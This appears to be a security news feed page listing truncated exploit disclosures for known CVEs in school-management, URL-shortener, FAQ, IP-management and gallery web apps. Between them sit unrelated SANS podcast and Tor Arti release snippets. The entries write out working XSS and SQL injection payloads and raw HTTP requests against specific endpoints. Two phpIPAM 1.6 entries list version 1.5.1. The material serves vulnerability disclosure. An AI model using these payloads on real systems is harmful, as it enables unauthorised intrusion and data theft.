Hacking

# Exploit Title: RosarioSIS 6.7.2 – Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis # Software Link: https://gitlab.com/francoisjacquet/rosariosis # Version: 6.7.2 # Tested on: Windows # CVE : CVE-2020-15718 Proof Of Concept http://rosariosis/Modules.php?modname=Scheduling/PrintSchedules.php&search_modfunc=list&include_inactive=” onmouseover=”alert(1)” Steps to Reproduce Log in as an admin user. Send the request. …

# Exploit Title: openSIS Community Edition 8.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/OS4ED/openSIS-Classic # Software Link: https://github.com/OS4ED/openSIS-Classic # Version: 8.0 # Tested on: Windows # CVE : CVE-2021-40617 Proof Of Concept GET /ForgotPassUserName.php?used_for=username&u=test%27%20OR%20%271%27%3D%271&user_type=student HTTP/1.1 Host: opensis Connection: close Steps to…

ISC Stormcast For Wednesday, December 3rd, 2025 https://isc.sans.edu/podcastdetail/9722, (Wed, Dec 3rd) Source link

# Exploit Title: YOURLS 1.8.2 – Cross-Site Request Forgery (CSRF) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/yourls/yourls/ # Software Link: https://github.com/yourls/yourls/ # Version: 1.8.2 # Tested on: Windows # CVE : CVE-2022-0088 Proof Of Concept CSRF PoC …

Arti is our ongoing project to create a next-generation Tor implementation in Rust. We’re happy to announce the latest release, Arti 1.8.0. This release introduces a new, usage-based, timeout for strongly isolated circuits, as specified in proposal 368. Arti now has experimental tokio-console support for development and debugging purposes. To use this feature, you will…

# Exploit Title: phpMyFAQ 3.1.7 – Reflected Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/thorsten/phpmyfaq/ # Software Link: https://github.com/thorsten/phpmyfaq/ # Version: 3.1.7 # Tested on: Windows # CVE : CVE-2022-3766 Proof Of Concept GET http://phpmyfaq1/index.php?action=main&search=%22%20onfocus%3D%22alert%281%29 Additional Conditions: – Ensure that no security mechanisms (like…

# Exploit Title: phpIPAM 1.5.1 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2023-1211 Proof Of Concept POST /app/admin/custom-fields/edit-result.php HTTP/1.1 Host: phpipam Cookie: PHPSESSID=; csrf_cookie= Content-Type: application/x-www-form-urlencoded csrf_cookie=&action=add&name=custom_sqli_test&fieldType=enum&fieldSize=0)%3B+SELECT+SLEEP(10)%3B+–+&table=devices&Comment=sql_poc&NULL=YES **Prerequisites:** 1….

# Exploit Title: Piwigo 13.6.0 – SQL Injection # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/Piwigo/Piwigo # Software Link: https://github.com/Piwigo/Piwigo # Version: 13.6.0 # Tested on: Windows # CVE : CVE-2023-33362 Proof Of Concept: GET /admin.php?page=profile&user_id=’ OR 1=1 — HTTP/1.1 Host: piwigo Steps to Reproduce Login as an…

# Exploit Title: phpIPAM 1.6 – Reflected Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2024-41357 Proof Of Concept # PoC to trigger XSS vulnerability in phpipam 1.6 # Ensure you are…

# Exploit Title: phpIPAM 1.6 – Reflected Cross-Site Scripting (XSS) # Date: 2025-11-25 # Exploit Author: CodeSecLab # Vendor Homepage: https://github.com/phpipam/phpipam/ # Software Link: https://github.com/phpipam/phpipam/ # Version: 1.5.1 # Tested on: Windows # CVE : CVE-2024-41358 Proof Of Concept GET http://phpipam/app/admin/import-export/import-devices-preview.php?&filetype=anyValidFiletype&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue Source link